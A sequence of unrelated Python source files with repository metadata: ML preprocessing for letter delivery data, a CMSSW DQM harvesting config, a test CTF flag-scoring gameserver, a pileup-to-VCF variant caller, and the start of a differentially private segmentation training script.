s = pd.Series(values[i], index = [tempRegisterdf.columns[0]])
tempRegisterdf = tempRegisterdf.append(s, ignore_index = True)
i += 1
result = tempRegisterdf
result.drop_duplicates(inplace = True)
result.dropna(inplace = True)
result.to_csv(fileName, index = False)
print('Done: ' + fileName)
# Dummy encoding rather slow right now, can be made faster
def DummyEncode(self, dataFrame, columnNameInRegister, columnNameInDataFrame, registerName):
registerDataFrame = self.LoadDataFrame(registerName)
#print(registerName + ': ', end = "")
#print(len(registerDataFrame.index))
#columnNameTemp = []
# Loads the Register into a temp Array
#i = 0
#while i < maxIndexOfRegister:
# columnNameTemp.append(nameRegister[columnName][i])
# i += 1
# Replace the string with a corresponding Numerical representation
#i = 0
#self.df.loc[self.df[columnName] == Value].index.get_values()
#while i < maxIndexOfRegister:
# dataFrame.replace({nameRegister[columnName][i]: nameRegister[columnName][i].index.get_values()}, regex = True, inplace = True)
# i += 1
# O(n^2) this is kinda bad
columnToEncode = list(registerDataFrame[columnNameInRegister])
dict = {}
for index, feature in enumerate(columnToEncode):
#try:
if dataFrame[columnNameInDataFrame].str.contains(feature).any():
#dataFrame.replace({feature : index}, regex = True, inplace = True)
#dataFrame[feature] = registerDataFrame[feature]
dict[feature] = index
#else:
#print('Feature ' + feature + ' was not in the DataFrame.')
#except:
#continue
dataFrame[columnNameInDataFrame] = dataFrame[columnNameInDataFrame].map(dict)
print('Done Encoding: ' + columnNameInDataFrame)
# This function replaces all the strings in the data frame, to a corresponding number and saves unique names to Register.csv
# For handling Data Frames with letters if they are legit or not
def DataPreprocessingSortingOne(self, dataFrame):
# Create Data Frame
# Axis: 0 = Rows, 1 = Columns
print('\nNow: Updating Registers.')
self.UpdateRegisters(dataFrame, 'Name' , 1)
self.UpdateRegisters(dataFrame, 'SurName', 1)
self.UpdateRegisters(dataFrame, 'Street' , 1)
self.UpdateRegisters(dataFrame, 'City' , 1)
print('Done: Updating Registers.')
# Theses are the columns in the data frame, if a value is missing replace it.
# Note, the dummy encoding can not handle numerical values and strings in the same column
# Update Register
print('Now: Dummy Encoding')
self.DummyEncode(dataFrame, 'Name' , 'Name' , '1NameRegister.csv')
self.DummyEncode(dataFrame, 'SurName', 'SurName', '1SurNameRegister.csv')
self.DummyEncode(dataFrame, 'Street' , 'Street' , '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'City' , '1CityRegister.csv')
print('Done: Dummy Encoding.')
# Dummy encode
# Fills all the NaN aka missing values with -1
print('Now: Replacing Missing Values.')
dataFrame['Name'] = dataFrame['Name'].fillna(-1)
dataFrame['SurName'] = dataFrame['SurName'].fillna(-1)
dataFrame['Street'] = dataFrame['Street'].fillna(-1)
dataFrame['City'] = dataFrame['City'].fillna(-1)
dataFrame['StreetNr'] = dataFrame['StreetNr'].fillna(-1)
dataFrame['ZipCode'] = dataFrame['ZipCode'].fillna(-1)
print('Done: Replacing Missing Values.')
# Change True/False to 1/0
print('Now: Replacing True/False to 1/0.')
correctAdress = {True : 1, False : 0}
dataFrame['Legitimate'] = dataFrame['Legitimate'].map(correctAdress)
print('Done: Replacing True/False to 1/0.\n')
#==============================================================================
# dataFrame['Name'] = dataFrame['Name'].fillna('missing')
# dataFrame['SurName'] = dataFrame['SurName'].fillna('missing')
# dataFrame['Street'] = dataFrame['Street'].fillna('missing')
# dataFrame['StreetNr'] = dataFrame['StreetNr'].fillna(-1)
# dataFrame['ZipCode'] = dataFrame['ZipCode'].fillna(-1)
# dataFrame['City'] = dataFrame['City'].fillna('missing')
#
# # Chane True/False to 1/0
# correctAdress = {True : 1, False : 0}
# dataFrame['Legitimate'] = dataFrame['Legitimate'].map(correctAdress)
#
# # This part replaces all the Strings with a corresponding number
# columnsToEncode = list(dataFrame.select_dtypes(include=['category','object']))
# le = LabelEncoder()
# for feature in columnsToEncode:
# try:
# dataFrame[feature] = le.fit_transform(dataFrame[feature])
# except:
# print('Error encoding '+ feature)
# return dataFrame
#==============================================================================
# For handling Data Frames with letter sent
def DataPreprocessingSortingTwo(self, dataFrame):
# Create Data Frame
# Axis: 0 = Rows, 1 = Columns
print('\nNow: Updating Registers.')
# This is the Start position of the letters
self.UpdateRegisters(dataFrame, 'Name' , 1)
self.UpdateRegisters(dataFrame, 'SurName', 1)
self.UpdateRegisters(dataFrame, 'Street' , 1)
self.UpdateRegisters(dataFrame, 'City' , 1)
# This is the End position of the letters
self.UpdateRegisters(dataFrame, 'StartStreet', 1, '1StreetRegister.csv')
self.UpdateRegisters(dataFrame, 'EndStreet' , 1, '1StreetRegister.csv')
self.UpdateRegisters(dataFrame, 'StartCity' , 1, '1CityRegister.csv')
self.UpdateRegisters(dataFrame, 'EndCity' , 1, '1CityRegister.csv')
print('Done: Updating Registers.')
# Theses are the columns in the data frame, if a value is missing replace it.
# Note, the dummy encoding can not handle numerical values and strings in the same column
# Update Register
print('Now: Dummy Encoding')
self.DummyEncode(dataFrame, 'Name' , 'Name' , '1NameRegister.csv')
self.DummyEncode(dataFrame, 'SurName', 'SurName', '1SurNameRegister.csv')
self.DummyEncode(dataFrame, 'Street' , 'Street' , '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'City' , '1CityRegister.csv')
self.DummyEncode(dataFrame, 'Street', 'StartStreet', '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'Street', 'EndStreet' , '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'StartCity' , '1CityRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'EndCity' ,'1CityRegister.csv')
print('Done: Dummy Encoding.')
# Dummy encode
# Fills all the NaN aka missing values with -1
print('Now: Replacing Missing Values.')
dataFrame['Name'] = dataFrame['Name'].fillna(-1)
dataFrame['SurName'] = dataFrame['SurName'].fillna(-1)
dataFrame['Street'] = dataFrame['Street'].fillna(-1)
dataFrame['City'] = dataFrame['City'].fillna(-1)
dataFrame['StreetNr'] = dataFrame['StreetNr'].fillna(-1)
dataFrame['ZipCode'] = dataFrame['ZipCode'].fillna(-1)
dataFrame['StartStreet'] = dataFrame['StartStreet'].fillna(-1)
dataFrame['StartStreetNr'] = dataFrame['StartStreetNr'].fillna(-1)
dataFrame['StartZipCode'] = dataFrame['StartZipCode'].fillna(-1)
dataFrame['StartCity'] = dataFrame['StartCity'].fillna(-1)
dataFrame['EndStreet'] = dataFrame['EndStreet'].fillna(-1)
dataFrame['EndStreetNr'] = dataFrame['EndStreetNr'].fillna(-1)
dataFrame['EndZipCode'] = dataFrame['EndZipCode'].fillna(-1)
dataFrame['EndCity'] = dataFrame['EndCity'].fillna(-1)
print('Done: Replacing Missing Values.')
# Change True/False to 1/0
print('Now: Replacing True/False to 1/0.')
correctAdress = {True : 1, False : 0}
dataFrame['Legitimate'] = dataFrame['Legitimate'].map(correctAdress)
dataFrame['CorrectDelivery'] = dataFrame['CorrectDelivery'].map(correctAdress)
print('Done: Replacing True/False to 1/0.\n')
##################################################################
# Data Sets #
##################################################################
# To see if a letter is legitimate or not
def DataSplitOne(self):
feature_col_names = ['Name', 'SurName', 'City', 'Street', 'StreetNr', 'ZipCode']
prediction_class_name = ['Legitimate']
X = self.df[feature_col_names].values # predictor feature columnd (8 X m)
y = self.df[prediction_class_name].values # predicted calss (1 = true, 0 = false) column (1 X m)
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size = self.testSize, random_state = 42) # 42 is the answer to everything
#Print to check if the split was to our liking
def DataSplitCheck(self):
print("Data Split:")
print("{0:0.2f}% in training set".format((len(self.X_train) / len(self.df.index)) * 100))
print("{0:0.2f}% in test set".format((len(self.X_test) / len(self.df.index)) * 100))
def DataSplitVerifying(self):
print("Original True : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['Legitimate'] == 1]), len(self.df.loc[self.df['Legitimate'] == 1]) / len(self.df.index) * 100))
print("Original False : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['Legitimate'] == 0]), len(self.df.loc[self.df['Legitimate'] == 0]) / len(self.df.index) * 100))
print()
print("Training True : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 1]), len(self.y_train[self.y_train[:] == 1]) / len(self.y_train) * 100))
print("Training False : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 0]), len(self.y_train[self.y_train[:] == 0]) / len(self.y_train) * 100))
print()
print("Test True : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 1]), len(self.y_test[self.y_test[:] == 1]) / len(self.y_test) * 100))
print("Test False : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 0]), len(self.y_test[self.y_test[:] == 0]) / len(self.y_test) * 100))
print()
def plot_corr(self, dataframe, size = 11):
# data frame correlation function
corr = dataframe.corr()
fig, ax = plt.subplots(figsize=(size, size))
# color code the rectangles by correlation value
ax.matshow(corr)
# draw x tick marks
plt.xticks(range(len(corr.columns)), corr.columns)
# draw y tick marks
plt.yticks(range(len(corr.columns)), corr.columns)
### TO SEE IF THE LETTER ARRIVED AT THE CORRECT ADDRESS OR NOT ###
def DataSplitTwo(self):
feature_col_names = ['Name', 'SurName', 'City', 'Street', 'StreetNr', 'ZipCode', 'StartStreet', 'StartStreetNr', 'City', 'StartZipCode', 'StartCity', 'EndStreet', 'EndStreetNr', 'EndZipCode', 'EndCity']
prediction_class_name = ['CorrectDelivery']
X = self.df[feature_col_names].values # predictor feature columnd (8 X m)
y = self.df[prediction_class_name].values # predicted calss (1 = true, 0 = false) column (1 X m)
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size = self.testSize, random_state = 42) # 42 is the answer to everything
def DataSplitVerifyingTwo(self):
print("Original True : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['CorrectDelivery'] == 1]), len(self.df.loc[self.df['CorrectDelivery'] == 1]) / len(self.df.index) * 100))
print("Original False : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['CorrectDelivery'] == 0]), len(self.df.loc[self.df['CorrectDelivery'] == 0]) / len(self.df.index) * 100))
print()
print("Training True : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 1]), len(self.y_train[self.y_train[:] == 1]) / len(self.y_train) * 100))
print("Training False : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 0]), len(self.y_train[self.y_train[:] == 0]) / len(self.y_train) * 100))
print()
print("Test True : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 1]), len(self.y_test[self.y_test[:] == 1]) / len(self.y_test) * 100))
print("Test False : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 0]), len(self.y_test[self.y_test[:] == 0]) / len(self.y_test) * 100))
print() | AiLogisticsTeam2017/ArtInt | LogisticsSimulation/DataPreprocessing.py | DataPreprocessing.py | py | 18,376 | python | en | code | 0 | github-code | 50 |
40248679760 | import FWCore.ParameterSet.Config as cms
from FWCore.ParameterSet.VarParsing import VarParsing
from Configuration.Eras.Era_Run3_cff import Run3
options = VarParsing('analysis')
options.register("doSim", True, VarParsing.multiplicity.singleton, VarParsing.varType.bool)
options.register("cmssw", "CMSSW_X_Y_Z", VarParsing.multiplicity.singleton, VarParsing.varType.string)
options.register("globalTag", "tag", VarParsing.multiplicity.singleton, VarParsing.varType.string)
options.register("dataSetTag", "sample", VarParsing.multiplicity.singleton, VarParsing.varType.string)
options.parseArguments()
process = cms.Process('HARVESTING',Run3)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.DQMSaverAtRunEnd_cff')
process.load('Configuration.StandardSequences.Harvesting_cff')
process.load('DQMOffline.Configuration.DQMOfflineMC_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1),
output = cms.optional.untracked.allowed(cms.int32,cms.PSet)
)
# Input source
process.source = cms.Source("DQMRootSource",
fileNames = cms.untracked.vstring('file:step3_inDQM.root')
)
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase1_2022_realistic', '')
# Path and EndPath definitions
if options.doSim:
process.harvesting_step = cms.Path(process.cscDigiHarvesting)
process.dqmsave_step = cms.Path(process.DQMSaver)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.dqmSaver.workflow = '/{}/{}/{}'.format(options.dataSetTag,options.globalTag,options.cmssw)
# Schedule definition
process.schedule = cms.Schedule()
if options.doSim:
process.schedule.extend([process.harvesting_step])
process.schedule.extend([process.endjob_step, process.dqmsave_step])
| cms-sw/cmssw | Validation/MuonCSCDigis/test/runCSCDigiHarvesting_cfg.py | runCSCDigiHarvesting_cfg.py | py | 2,247 | python | en | code | 985 | github-code | 50 |
29634270624 | #!/usr/bin/env python3.5
"""A simple gameserver based on asyncio that returns
random states for submitted flags.
./gameserver-asyncio.py [host] [port]"""
import sys
import socket
import re
import asyncio
import random
import codecs
HOST = '127.0.0.1'
PORT = 8888
STATES = [b'expired', b'no such flag', b'accepted',
b'corresponding', b'own flag', b'too much']
FLAGS = re.compile(br'(\w{31}=)')
class GameServerProtocol(asyncio.Protocol):
def connection_made(self, transport):
self.transport = transport
self.peername = transport.get_extra_info('peername')
self._write_line(b'Welcome to the Game Server')
self._write_line(b'Send me your flags...')
def data_received(self, data):
response = b''
for line in data.split(b'\n'):
if not line:
continue
if not FLAGS.findall(line):
self._write_line(b'invalid flag')
continue
response += random.choice(STATES)
response += b'\n'
self.transport.write(response)
def _write_line(self, data):
if isinstance(data, str):
data = codecs.encode(data)
self.transport.write(data + b'\n')
if __name__ == '__main__':
print('Starting Game Server')
if len(sys.argv) >= 2:
HOST = sys.argv[1]
try:
socket.inet_aton(HOST)
except socket.error:
print('Invalid IP address')
sys.exit(1)
if len(sys.argv) == 3:
PORT = sys.argv[2]
try:
int(PORT)
except ValueError:
print('Port is not an int')
sys.exit(1)
loop = asyncio.get_event_loop()
c = loop.create_server(GameServerProtocol, HOST, PORT)
server = loop.run_until_complete(c)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
| takeshixx/ctfpwn | tests/gameserver-asyncio.py | gameserver-asyncio.py | py | 1,990 | python | en | code | 0 | github-code | 50 |
35571579331 | import sys
import numpy
import datetime
import re
import collections
from collections import OrderedDict
import math
import time
##
## STRING DEFINITIONS - constant strings of files that were used and additional info that couldn't be pulled from the files
##
ref_assembly_str = ',assembly=b37'
ref_md5_str = ',md5=bb77e60e9a492fd0172e2b11e6c16afd'
ref_species_str = ',species=\"Homo sapiens\"'
ref_taxonomy_str = ',taxonomy=x' #couldn't find what this acctually means
##
## VCF CONTIG INFO FUNC - Pulls out information on all contigs from reference .fasta.fai file
##
def write_contig_info(file):
contig_info =''
for line in file:
field = line.split('\t')
ID_str = field[0]
len_str = field[1]
contig_info += '##contig=<ID=' + ID_str + ",length=" + len_str +'>\n' # + ref_assembly_str + ref_md5_str + ref_species_str + ref_taxonomy_str
return contig_info
##
## VCF HEADER FUNCTION - Writes out header of the .vcf file
##
def write_vcf_header(file, fai_file_str):
date_time = datetime.datetime.now()
file_format_str = '##fileformat=VCF4.2\n'
date_str = '##fileDate=' + date_time.strftime("%Y%m%d") + '\n'
source_str = '##source=variant_call_binomV0.1\n'
ref_file_str = '##reference=file://' + fai_file_str + '\n'
contig_info_str = ''
if(fai_file_str != ''):
fai = open (fai_file_str, 'r')
contig_info_str = write_contig_info(fai)
else:
print('Warning: Fasta Index file not provided. Contig info will not be available in .vcf file.')
alt_str = '##ALT=<ID=*,Description="Represents allele(s) other than observed.">\n'
indel_str = '##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Indicates that the variant is an INDEL.">\n'
dp_str = '##INFO=<ID=DP,Number=1,Type=Integer,Description="Raw read depth">\n'
gt_str = '##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">\n'
vaf_str = '##FORMAT=<ID=VAF,Number=1,Type=Float,Description="Variant frequency in sample">\n'
table_header_str = '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tHCC1143BL\n'
file.write(file_format_str + date_str + source_str + ref_file_str + contig_info_str + alt_str + indel_str + dp_str + gt_str + vaf_str + table_header_str)
return file
##
## CALCULATE VARIANTS CALLS
##
class Variant:
def __init__(self, symbol, num_occ, num_reads, ref_symbol):
self.var_type, self.var_symbol, self.var_len = self.variant_def(symbol, ref_symbol)
self.num_occ = num_occ
self.num_reads = num_reads
self.occ_percent = round(float(num_occ/num_reads), 1)
self.VAF = str(self.occ_percent)
self.DP = str(self.num_reads)
def variant_def(self, symbol, ref_symbol):
if ( len(symbol) == 1):
var_symbol = symbol
if(symbol == '.'):
var_type = 'REF'
else:
var_type = 'SNV'
var_len = 1
else:
if(symbol[0]== '+'):
var_type = 'INS'
else:
var_type = 'DEL'
var_symbol = ref_symbol + ''.join(filter(str.isalpha, symbol))
var_len = int(''.join(filter(str.isdigit, symbol)))
return var_type, var_symbol, var_len
def binomial(n, k, p):
return (math.factorial(n)/(math.factorial(k)*math.factorial(n-k)))*(p**k)*(1-p)**(n-k)
def calculate_binomial(var1, var2):
res_vars = {}
res1 = binomial(float(var1.num_reads), float(var1.num_occ), float(p))
res2 = binomial(float(var2.num_reads), float(var2.num_occ), float(p))
res3 = binomial(float(var1.num_reads), float(var1.num_reads), float(p))
if(res1 >= res2):
if(res1 > res3):
return var1, None
else:
return var1, var2
else: #res1 < res2
if(res2 > res3):
return var2, None
else:
return var1, var2
def prepare_read_str(read_str): #raname to calculate_variants
read_str = re.sub('\^.', '', read_str) #remove caret and next symbol
read_str = re.sub('\$', '', read_str ) #remove dollar
read_str = re.sub('\,', '.', read_str) #substitute comma with dot
read_str = read_str.upper() #switch all letters to uppercase
return read_str
##
## STORE SINGLE PILEUP CALLS
##
class Pileup_line:
def __init__(self, new_line):
self.new_line = new_line
field = new_line.split("\t")
self.seq_str = field[0] # sequence name string
self.pos_str = field[1] # position string
self.ref_str = field[2] # reference base string
self.cnt_str = field[3] # read count string
self.res_str = field[4] # result string
self.qual_str = field[5] # base quality string
self.pos = int(self.pos_str)
self.cnt = int(self.cnt_str)
self.read_vars = collections.OrderedDict()
self.read_vars = {
'.':0,
'A':0,
'T':0,
'C':0,
'G':0
}
self.var1 = None
self.var2 = None
def process_read_line(self):
self.find_variants(self.res_str)
return self.call_variants_binomial(self.var1, self.var2)
def find_variants (self, read_str):
# var1 = None
# var2 = None
has_ins = read_str.find('+')
has_del = read_str.find('-')
read_str = prepare_read_str(read_str)
if ((has_ins == -1) and (has_del == -1)):
sym_cnt = collections.Counter(read_str.strip('"')).most_common()
# print(sym_cnt)
if (len(sym_cnt) == 1):
self.var1 = Variant(sym_cnt[0][0], sym_cnt[0][1], self.cnt, self.ref_str)
self.var2 = None
else:
self.var1 = Variant(sym_cnt[0][0], sym_cnt[0][1], self.cnt, self.ref_str)
self.var2 = Variant(sym_cnt[1][0], sym_cnt[1][1], self.cnt, self.ref_str)
elif (has_ins != -1 or has_del != -1):
# print("INDEL")
self.prepare_read_vars(read_str)
if(self.read_vars_list[1][1] == 0):
self.var1 = Variant(self.read_vars_list[0][0], self.read_vars_list[0][1], self.cnt, self.ref_str)
self.var2 = None
else:
self.var1 = Variant(self.read_vars_list[0][0], self.read_vars_list[0][1], self.cnt, self.ref_str)
self.var2 = Variant(self.read_vars_list[1][0], self.read_vars_list[1][1], self.cnt, self.ref_str)
# print(self.var1.var_symbol)
# print(self.var2.var_symbol)
def prepare_read_vars(self, read_str):
skip_index = 0
for i in range(0, len(read_str)):
if(i<skip_index) : continue #skip indel symbols
if(read_str[i] == '+' or read_str[i] == '-'):
num_len = 0
for j in range (i+1, len(read_str)):
if(read_str[j].isnumeric()): num_len +=1
else: break
indel_len = int(read_str[i+1 : i+1+num_len])
# if(read_str[i-1] == '.'):
new_indel = read_str[(i):(i+num_len+indel_len+1)]
# else:
# new_ins = read_str[i-1] + read_str[(i+2):(i+2+ins_len)]
if new_indel in self.read_vars : self.read_vars.update({new_indel:self.read_vars[new_indel]+1})
else : self.read_vars.update({new_indel:1})
self.read_vars.update({'.':self.read_vars['.']-1}) #need to substitute number of matches by one
skip_index = i + num_len + indel_len +1
if(read_str[i] == '.'): self.read_vars.update({'.' :self.read_vars['.']+1})
if(read_str[i] == 'A'): self.read_vars.update({'A' :self.read_vars['A']+1})
if(read_str[i] == 'T'): self.read_vars.update({'T' :self.read_vars['T']+1})
if(read_str[i] == 'C'): self.read_vars.update({'C' :self.read_vars['C']+1})
if(read_str[i] == 'G'): self.read_vars.update({'G' :self.read_vars['G']+1})
self.read_vars = OrderedDict(sorted(self.read_vars.items(), key=lambda item: item[1], reverse=True))
self.read_vars_list = list(self.read_vars.items())
def call_variants_binomial(self, var1, var2):
result_line = ''
genotype_str = ''
ref_field = 'ERROR'
alt_field = 'ERROR'
gt_field = 'ERROR'
info_field = 'DP=' + var1.DP
if var2 is None: #single variant call
# print('single variant: ' + var1.var_symbol)
ref_field = self.ref_str
alt_field = var1.var_symbol
if(var1.var_symbol == '.'):
gt_field = '0/0:'+var1.VAF
else:
gt_field = '1/1:'+var1.VAF
else: #binomial calculation of two most probable calls
var1, var2 = calculate_binomial(var1, var2)
if(var2 is None): #one call is the most probable one
# print('binomial, single variant: ' + var1.var_symbol)
if(var1.var_type == 'INS' or var1.var_type == 'DEL'):
info_field = 'INDEL;' + info_field
if(var1.var_type == 'DEL'):
ref_field = var1.var_symbol
alt_field = self.ref_str
gt_field = '1/1:'+var1.VAF
else:
ref_field = self.ref_str
alt_field = var1.var_symbol
if(var1.var_symbol == '.'):
gt_field = '0/0:'+var1.VAF
else:
gt_field = '1/1:'+var1.VAF
else: #two calls are most probable
# print('binomial, double variant: '+var1.var_symbol + '/' + var2.var_symbol)
if(var1.var_type == 'INS' or var1.var_type == 'DEL' or var2.var_type == 'INS' or var2.var_type == 'DEL'):
info_field = 'INDEL;' + info_field
if(var1.var_type == 'DEL' and var2.var_type == 'DEL'):
ref_field = var1.var_symbol
alt_field = self.ref_str
gt_field = '1/1:'+var1.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
ref_field = var2.var_symbol
alt_field = self.ref_str
gt_field = '1/1:'+var2.VAF
elif(var1.var_type == 'DEL' and var2.var_type != 'DEL'):
ref_field = var1.var_symbol
alt_field = self.ref_str
gt_field = '0/0:'+var1.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
info_field = 'DP=' + var1.DP
ref_field = self.ref_str
alt_field = var2.var_symbol
if(var2.var_symbol == '.'):
gt_field = '0/0:' + var2.VAF
else:
gt_field = '0/1:' + var2.VAF
elif(var1.var_type != 'DEL' and var2.var_type == 'DEL'):
ref_field = var2.var_symbol
alt_field = self.ref_str
gt_field = '0/0:'+var2.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
info_field = 'DP=' + var1.DP
ref_field = self.ref_str
alt_field = var1.var_symbol
if(var1.var_symbol == '.'):
gt_field = '0/0:'+var1.VAF
else:
gt_field = '0/1:'+var1.VAF
else: # (var1.var_type != 'DEL' && var2.var_type != 'DEL')
ref_field = self.ref_str
if(var1.var_symbol == '.'):
alt_field = var2.var_symbol
gt_field = '0/1:' + var1.VAF + ',' + var2.VAF
elif (var2.var_symbol == '.'):
alt_field = var1.var_symbol
gt_field = '0/1:' + var2.VAF + ',' + var1.VAF
else:
alt_field = var1.var_symbol + ',' + var2.var_symbol
gt_field = '1/2:'+var1.VAF + ',' + var2.VAF
result_line += self.seq_str + '\t' + self.pos_str + '\t' + '.' + '\t' + ref_field + '\t'
result_line += alt_field + '\t' + '.' + '\t' + 'PASS' + '\t' + info_field + '\t' + 'GT:VAF' + '\t' + gt_field + '\n'
return result_line
##
## MAIN Function - goes through the pileup file, writes to .vcf file
##
def main_func(pileup_file_str, output_file_str, reference_fai_file_str):
with open (pileup_file_str, 'r') as pileup_file, open (output_file_str, 'w') as output_file:
output_file = write_vcf_header(output_file, reference_fai_file_str)
line_num = 0;
for line in iter(pileup_file.readline, ''):
line_num+=1
#if (line_num > 3): break
base_pileup = Pileup_line(line)
if(base_pileup.cnt > 0):
res_str = str(base_pileup.res_str)
processed_str = base_pileup.process_read_line()
output_file.write(processed_str)
print('Processing done.' + output_file_str + ' file created.')
##
## MAIN CODE - opens files, calls main task
##
if __name__ == "__main__" :
if(len(sys.argv) < 2):
print('Error: Please provide pileup file path')
raise NameError('Missing_arguments')
else:
pileup_file_str = sys.argv[1]
output_file_base_str = 'binom_variant'
fai = ''
p_array = [0.85]
o_def = 0
p_def = 0
f_def = 0
for i in range(2, len(sys.argv)):
if(sys.argv[i-1] == '-o' or sys.argv[i-1] == '-f'): continue
if(sys.argv[i] == '-o'):
if(o_def == 1):
print('Error: -o switch already defined')
raise NameError('Incorrect_arguments')
output_file_base_str = sys.argv[i+1]
o_def = 1
if(sys.argv[i] == '-f'):
if(f_def == 1):
print('Error: -f switch already defined')
raise NameError('Incorrect_arguments')
fai = sys.argv[i+1]
f_def = 1
if(sys.argv[i] == '-p'):
if(p_def != 0):
print('Error: -p switch already defined')
raise NameError('Incorrect_arguments')
p_def = i+1
if(p_def != 0):
p_array = []
for i in range(p_def, len(sys.argv)):
if(sys.argv[i] == '-o' or sys.argv[i] == '-f'): break
p_array.append(float(sys.argv[i]))
if(len(p_array) == 0):
print('Error: No percentages defined')
raise NameError('Incorrect_arguments')
start = time.time()
for i in p_array:
i_str = str(i)
p = i
if (output_file_base_str.rfind(".vcf", 0, len(output_file_base_str)) == -1):
output_file_str = output_file_base_str + '_p' + str(i) + '_called.vcf'
else:
output_file_str = output_file_base_str[0:output_file_base_str.rfind(".vcf", 0, len(output_file_base_str))] + '_p' + str(i) + '_called.vcf'
main_func(pileup_file_str, output_file_str, fai)
end = time.time()
print('Processing took ' + str(end - start) + ' seconds') | apanajotu/GI | GI Projekat/variant_call_binom.py | variant_call_binom.py | py | 16,784 | python | en | code | 0 | github-code | 50 |
36869289244 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from threading import Event, Thread
def countdown(n, started_evt):
print('start')
started_evt.set()
while n > 0:
print(n)
n -= 1
time.sleep(5)
started_evt = Event()
print('Launching countdown')
t = Thread(target=countdown, args=(10, started_evt))
t.start()
t.join()
started_evt.wait()
print('countdown is running')
| YellowDong/experience | python_learning/threading/thread.py | thread.py | py | 414 | python | en | code | 0 | github-code | 50 |
3664284212 | import argparse
import random
import warnings
from datetime import datetime
import pickle
import matplotlib.pyplot as plt
import numpy as np
import torch
from opacus import PrivacyEngine
from opacus.utils.batch_memory_manager import BatchMemoryManager
from torch.optim.lr_scheduler import ReduceLROnPlateau
from utils import (
get_liver_dataloaders,
test,
train
)
from linknet9 import LinkNet9
from unet9 import UNet9
from parameter import Parameters
import segmentation_models_pytorch as smp
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", type=str, default="carvana", choices=["carvana", "pancreas", "liver"])
parser.add_argument("--model-arch", type=str, default="monet", choices=["monet", "unet", "unet9", "linknet9"])
parser.add_argument("--batch-size", type=int, default=32)
parser.add_argument("--epochs", type=int, default=10)
parser.add_argument("--act-func", type=str, default="mish", choices=["tanh", "relu", "mish"])
parser.add_argument("--target-epsilon", type=float, default=3)
parser.add_argument("--noise-mult", type=float, default=None)
parser.add_argument("--grad-norm", type=float, default=1.5)
parser.add_argument("--privacy", type=bool, action=argparse.BooleanOptionalAction, default=True)
parser.add_argument("--scale-norm", type=bool, action=argparse.BooleanOptionalAction, default=False)
parser.add_argument("--norm-layer", type=str, default="group")
parser.add_argument("--num-groups", type=int, default=32)
return parser.parse_args()
def hook_fn(module, input, output):
visualisation[module] = np.transpose(torch.flatten(output.cpu()).detach().numpy())
def get_all_layers(model):
for name, layer in model._modules.items():
layer.register_forward_hook(hook_fn)
if __name__ == "__main__":
warnings.filterwarnings("ignore")
SEED = 1302
torch.backends.cudnn.deterministic = True
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed_all(SEED)
generator = torch.Generator().manual_seed(SEED)
args = parse_args()
params = Parameters(
args.dataset,
args.batch_size,
args.act_func,
args.model_arch,
args.epochs,
args.target_epsilon,
args.grad_norm,
args.noise_mult,
args.privacy,
args.scale_norm,
args.norm_layer,
args.num_groups
)
if args.dataset == 'liver':
train_loader, val_loader = get_liver_dataloaders(params)
else:
raise ValueError(
"Please specify a valid dataset. ('liver')"
)
if args.model_arch == 'linknet9':
model = LinkNet9(1, 1, scale_norm=args.scale_norm, norm_layer=args.norm_layer).to(params.device)
elif args.model_arch == 'unet9':
model = UNet9(1, 1, scale_norm=args.scale_norm, norm_layer=args.norm_layer).to(params.device)
else:
raise ValueError(
"Please specify a valid architecture. ('linknet9', 'unet9')"
)
modules_to_visualize = [model.conv2, model.res1, model.scale_norm_1,
model.conv4, model.res2, model.scale_norm_2,
model.conv5, model.deco1, model.scale_norm_3,
